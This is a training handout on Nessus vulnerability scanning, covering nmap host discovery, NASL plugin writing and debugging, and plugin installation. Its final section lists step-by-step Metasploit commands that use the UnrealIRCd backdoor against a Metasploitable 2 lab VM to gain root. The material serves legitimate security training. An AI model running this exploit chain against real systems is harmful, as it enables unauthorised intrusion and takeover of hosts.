Nessus Training
Session 3 - Advanced Topics
Prepared by Ramsey Dow <ramsey@casaba.com> for NWACC
Contents
Pre-scan Workflow
Update plugin library
Identify targets
Scan Automation
Custom Plugin Development
Plugin IDs
Where the plugins are
Running plugins from the command line
Signed and unsigned scripts
Debugging
Example from the NASL documentation
Optimizing your script
Rules for plugins
How to install a custom plugin
Test the new custom plugin
How to remove custom plugins
Using Nessus with Metasploit
Useful Web Sites and Resources
Scan Automation
Custom Plugin Development
Using Nessus with Metasploit
Pre-scan Workflow
It’s quite alright to let Nessus do everything for you. It does use Nmap under the hood.
However, I like to take more control myself. Aside from satisfying the control freak in me, this
also allows me to exclude IPs of hosts I don’t want to scan.
Update plugin library
Tenable updates Nessus plugins on a daily basis. The Nessus daemon will pull new updates
once per 24 hour period. However, new plugins can arrive at many times throughout the day.
I tend to update plugins on the scan server prior to running any meaningful scan.
sudo /opt/nessus/sbin/nessus-update-plugins
Identify targets
I have a scanning workspace that looks like this:
scan\
archive\
2013\
01\
02\
...
10\
scripts\
I keep scan-related data in the archive directory, organized by year and month. I stash
time-saving scripts in the scripts directory.
On any given month when I perform scans against a regularly scheduled target, I set the
SCANPATH variable:
SCANPATH="archive/`date +%Y`/`date +%m`"
Then I create the new workspace:
mkdir -p $SCANPATH
Now I can use nmap directly to perform host discovery using options that make sense for the
engagement:
sudo nmap --privileged -sn -oX ${SCANPATH}/network_name.xml ip/mask >& /dev/n
ull
At this step I can use nmap’s --exclude switch to ignore IPs, such as fragile printers.
This gives me an XML file containing host discovery information. Useful, to be sure, but not
consumable by Nessus. I wrote a Ruby script to remedy the situation.
./scripts/nmap2nessus.rb ${SCANPATH}/network_name.xml > ${SCANPATH}/network_t
argets.txt
nmap2nessus.rb consumes the XML output from nmap and converts it into a Nessus-style
host list. I can upload this list directly into a Nessus scan template.
Scan Automation
lawnmower.rb demonstration.
Custom Plugin Development
NASL is the Nessus Attack Scripting Language. It is a C-like scripting language designed for
implementing security tests. It comes with a couple of security guarantees:
will not send any packet to a host other than the target host
will not execute any commands on your local system
In addition, NASL maintains a small memory footprint compared to other scripting languages.
It is not robust like Python or Ruby.
# This Example displays the FTP banner of the remote host :
soc = open_sock_tcp(21);
if(soc)
{
data = recv_line(socket:soc, length:1024);
if(data)
{
display("The remote FTP banner is : \n", data, "\n");
}
else
{
display("The remote FTP server seems to be tcp-wrapped\n");
}
close(soc);
}
Plugin IDs
Plugins are referenced by IDs. People should use 50000–52999 for custom plugins; the
60000–69999 range is used by Security Center when auto-generating
plugins ID’s for compliance checks.
Where the plugins are
Plugins live in the /opt/nessus/lib/nessus/plugins directory.
.inc files contain functions and are included by NASL scripts. .nasl files are Nessus
plugins.
Running plugins from the command line
You use the nasl program to run Nessus plugins from the command line.
nasl is meant to be run serverside, and not by users. If you are running nasl scripts on the
command line then it is difficult to see what is happening.
/opt/nessus/bin/nasl -t 127.0.0.1 -T f.out /opt/nessus/lib/nessus/plugins/fin
ger.nasl
This command checks for the presence of fingerd on localhost. nasl isn’t meant to be
user-friendly, and doesn’t have output like you might expect. The -T option specifies that we
want a debug trace written to a file named f.out.
$ tail -n 2 f.out
[finger.nasl, 2258.1, 1381203487.704611] (TRACE) call open_sock_tcp(, , , , 7
9 )
[finger.nasl, 2258.1, 1381203487.704777] (TRACE) ret -> 0
nasl tried to connect to port 79 and failed, hence ret -> 0. fingerd is not running on this
machine.
Signed and unsigned scripts
By default, Nessus won’t run unsigned scripts that perform privileged operations, where
privileged means doing things which allow the script to escape its sandbox. Remember,
NASL comes with security guarantees, including not doing unexpected bad things to the
scan server running the script.
If your script does privileged things then you will have to edit
/opt/nessus/etc/nessus/nessusd.conf.imported and change the line that starts
nasl_no_signature_check = no to yes. If you are performing a traditional network
check, you do not need to change this setting.
Additionally, you can pass the -X switch to nasl from the command line. This will cause
nasl to skip the signature check. Doesn’t work with Nessus. For that you will have to modify
the nessusd.conf.imported file.
Debugging
When writing your own scripts it can be useful to engage in bouts of printf style debugging
to see what is going on.
You’ve got two options:
display()
Writes to stdout
stdout redirects to /var/nessus/logs/nessus.dump when run by nessusd
debug_print()
You need to include("global_settings.inc") in yours script
This only fires if debug_level is non-zero
Example from the NASL documentation
$ /opt/nessus/bin/nasl -t 127.0.0.1 -T f.out /opt/nessus/lib/nessus/plugins/t
est_ssh.nasl
$ cat f.out
[test_ssh.nasl, 5259.1, 1381205788.368034] (TRACE) call get_kb_item(Services/
ssh )
[test_ssh.nasl, 5259.1, 1381205788.368045] (TRACE) ret ->
[test_ssh.nasl, 5259.1, 1381205788.368048] (TRACE) call get_port_state(22 )
[test_ssh.nasl, 5259.1, 1381205788.368053] (TRACE) ret -> 1
[test_ssh.nasl, 5259.1, 1381205788.368054] (TRACE) call open_sock_tcp(, , , ,
22 )
[test_ssh.nasl, 5259.1, 1381205788.368152] (TRACE) ret -> 1000000
[test_ssh.nasl, 5259.1, 1381205788.368164] (TRACE) call recv(200 , , 1000000
, )
[test_ssh.nasl, 5259.1, 1381205789.372535] (TRACE) ret -> SSH-2.0-OpenSSH_6.1
p1 Debian-4..
[test_ssh.nasl, 5259.1, 1381205789.372551] (TRACE) call close(1000000 )
[test_ssh.nasl, 5259.1, 1381205789.372685] (TRACE) ret -> 0
Optimizing your script
The best way to optimize your script is to tell nessusd when to not launch it.
If your script depends on a TCP port being open then indicate that your script requires that
port to be open.
script_require_ports(80, "Services/www")
Services/www is a symbolic value, as defined in the Nessus knowledge base.
The Nessus knowledge base representes the state of a scan. Your script may require the
presence of certain state in order to run e.g., anonymous ftp with writable directories.
script_require_keys("ftp/anonymous", "ftp/writeable_dir")
This will only execute the script if the remote FTP server offers an anonymous access and if
there is a writeable directory in it.
You can also exclude keys:
script_exclude_keys(k1, k2, ...)
This will cause nessusd to not execute your script if at least one of the keys given in
argument is set in the knowledge base.
Rules for plugins
Your script must never interact with the user
Your script must test one vulnerability
Your script should belong to an existing family
Look up in CVE to see if there is a definition of your script
How to install a custom plugin
First, copy it to the plugins directory.
sudo cp plugin.nasl /opt/nessus/lib/nessus/plugins
Make sure you don’t have a name conflict!
Stop the Nessus daemon.
sudo service nessusd stop
Restart the Nessus daemon, instructing it to rebuild the plugin index.
sudo /opt/nessus/sbin/nessusd -R
nessusd -R takes a long time as it recompiles the entire plugin database. You can use
nessusd -t instead, it tells nessusd to only recompile the plugins whose timestamp has
changed since the last run. This is much faster.
Test the new custom plugin
Create a policy named ssh
Disable all plugin families
Enable service checks and administrative toolbox
Scan a test host using the ssh policy
Review the scan report
Disable ssh on the test host
Rescan the test host
Review the new scan report
Note that the lack of ssh on the test host is flagged as a vulnerability
How to remove custom plugins
Stop the Nessus daemon.
sudo service nessusd stop
Restart the Nessus daemon, instructing it to rebuild the plugin index.
sudo /opt/nessus/sbin/nessusd -R
The “Administrative toolbox” family will still show in policies that reference it. Clicking on the
plugin group will do nothing since it contains no plugins (you removed them). The plugin
family doesn’t show up as an option in new policies.
This weird behavior is why there is a rule about creating new plugin families. Don’t do it!
Using Nessus with Metasploit
Using Nessus with Metasploit is pretty easy and definitely a fun way to spend a Saturday
afternoon!
I installed Metasploit Framework 4 on Ubuntu Desktop 13.04.
Scan something using Nessus (10.211.55.7 in the example, below)
Export the scan results in the NBE format
scp the NBE file to your Metasploit host
Login to the Metasploit host and follow this basic procedure:
sudo msfconsole
db_import bfd6a1940f2061ba5532f33c1197a359.nbe
hosts
services 10.211.55.7
vulns 10.211.55.7 -p 6667
search cve:2010-2075
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST 10.211.55.7
exploit
Voila. root in just a few steps!
For the record, my victim host was a VM running the Metasploitable 2 image.
Useful Web Sites and Resources
Scan Automation
Nessus 5.0 REST Protocol Specification
http://static.tenable.com/documentation/nessus_5.0_XMLRPC_protocol_guide.pdf
CPAN Module Net::Nessus::XMLRPC - perl library for communication with Nessus
scanner(v4.2+) via XMLRPC
https://github.com/kost/nessus-xmlrpc-perl
Ruby gem/library for Nessus XMLRPC interface and Nessus command line example
https://github.com/kost/nessus-xmlrpc-ruby
Python module written for automating tasks within the latest version of Nessus
http://code.google.com/p/nessusxmlrpc/
Custom Plugin Development
Complete list of Nessus plugins
http://www.tenable.com/plugins/index.php?view=all
The Nessus Attack Scripting Language Reference Guide
http://www.dn-systems.org/boss/doc/nasl_guide–20050103.pdf
NASL Documentation
https://discussions.nessus.org/servlet/JiveServlet/download/5815–1228/nasl2_reference.pdf
Using Nessus with Metasploit
Metasploit penetration testing tool
http://www.rapid7.com/products/metasploit/download.jsp
(grab Metasploit Framework from the bottom of the page)
Metasploitable 2 - intentionally vulnerable Linux virtual machine
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/